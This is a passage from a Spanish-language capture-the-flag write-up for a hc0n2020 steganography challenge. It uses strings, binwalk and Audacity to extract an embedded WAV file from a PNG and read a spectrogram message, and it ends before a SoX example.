<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Audacity v2.3.3 </span><a href="https://www.audacityteam.org/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.audacityteam.org/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SoX v14.4.2 </span><a href="http://sox.sourceforge.net/SoX/Resampling" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://sox.sourceforge.net/SoX/Resampling</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Resumen:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Descargamos el archivo llamado samurai.png (3b372f42d7cae06d04f44eb8490038ef) con un archivo de imagen</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> PNG. Para ver todas las cadenas en el archivo utilizamos </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">strings -n 7 -t x</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. Usamos -n 7 para cadenas de longitud </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">7+ y -t x para ver su posición en el archivo. Detectamos un archivo audio WAV incrustado. </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(</span><a href="https://github.com/Ge0rg3/StegOnline/blob/master/src/app/checklist/checklist.component.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/Ge0rg3/StegOnline/blob/master/src/app/checklist/checklist.component.html</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> )</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># md5sum samurai.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">3b372f42d7cae06d04f44eb8490038ef samurai.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># file samurai.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">samurai.png: PNG image data, 480 x 720, 8-bit/color RGB, non-interlaced</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># strings -n 7 -t x samurai.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 17f DJ b</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">"^i</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 50c nai8<tHG</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> b48 qBgU^NGn5</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ...</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 6924e nArH"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">uV</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 69306 tS<C+z5Q</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 695c3 K:zt1wj</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 6b5cc wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> root@1v4n:~/CTF/hc0n2020/stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># binwalk -Me samurai.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Scan Time: 2020-01-</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Target File: /root/CTF/hc0n2020/stego/samurai.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> MD5 Checksum: 3b372f42d7cae06d04f44eb8490038ef</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Signatures: 391</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> DECIMAL HEXADECIMAL DESCRIPTION</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> --------------------------------------------------------------------------------</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 0 0x0 PNG image, 480 x 720, 8-bit/color RGB, non-interlaced</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 41 0x29 Zlib compressed data, best compression</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 161106 0x27552 Zip archive data, at least v2.0 to extract, compressed size: 278566, uncompressed size: 1322620, name: wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 439800 0x6B5F8 End of Zip archive, footer length: 22</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Scan Time: 2020-01-</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Target File: /root/CTF/hc0n2020/stego/_samurai.png-0.extracted/29</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Signatures: 391</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> DECIMAL HEXADECIMAL DESCRIPTION</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> --------------------------------------------------------------------------------</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Scan Time: 2020-01-</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Target File: /root/CTF/hc0n2020/stego/_samurai.png.extracted/wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> MD5 Checksum: 04416be5a3ab8ef0248150158095ff97</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Signatures: 391</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> DECIMAL HEXADECIMAL DESCRIPTION</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> -------------------------------------------------------------------------------</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Detectamos un espectrograma con la cadena "SHINOBI" en el archivo de audio WAV </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">twin.wav (04416be5a3ab8ef0248150158095ff97).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">#</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># md5sum wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">04416be5a3ab8ef0248150158095ff97 wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># file wind.wav</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">wind.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 44100 Hz</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># audacity wind.wav</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 288px; overflow: hidden; width: 597px;"><img height="288" src="https://lh4.googleusercontent.com/qNCLlapoG_ko6ggJapwJqUlbkZDp3OaXOzgWoU_afftYXM11X10FZntVG807hC8zCqvPtS7CT-aqSCfubsxp6ebRMt03yzI_rXEs-PVRREVrC_iogm3KUGtda8U_t5zEhsGyG8T5" style="margin-left: 0px; margin-top: 0px;" width="597" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Alternativamente, podemos generar automáticamente espectrogramas para uno o más archivos de audio usando </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SoX (</span><a href="https://arielvb.readthedocs.io/en/latest/docs/commandline/sox.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://arielvb.readthedocs.io/en/latest/docs/commandline/sox.html</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> )</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
